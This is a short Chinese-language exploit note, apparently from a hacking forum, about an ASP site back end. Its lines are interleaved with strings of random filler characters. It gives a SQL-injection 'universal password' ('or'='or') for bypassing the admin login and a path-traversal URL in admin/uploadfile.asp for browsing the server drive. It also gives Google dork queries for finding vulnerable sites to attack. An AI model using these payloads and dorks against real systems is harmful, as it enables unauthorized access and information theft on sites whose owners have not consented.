后台万能密码 'or'='or'
# U8 j% G' ~) e) T7 V# W) u8 r8 J+ A5 j
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% }7 U6 l& ^4 Y) l( T8 q- Aadmin/uploadfile.asp?currentFolder=/upfiles/../
. J4 Y4 h7 _' \6 o4 z; g
2 R7 p5 d/ I7 H2 O6 c1 |漏洞证明:
5 K4 \7 U3 C/ u( x( u& _7 }% {
% _3 w& |; o- D6 p6 O0 ^谷歌:inurl:type.asp?id=1 新闻中心# N. p" z2 ?8 A2 D4 u* t8 O
或者 :inurl:download_ok.asp?- n6 G; G7 D) g
J, N1 P3 l" u" L8 D2 E |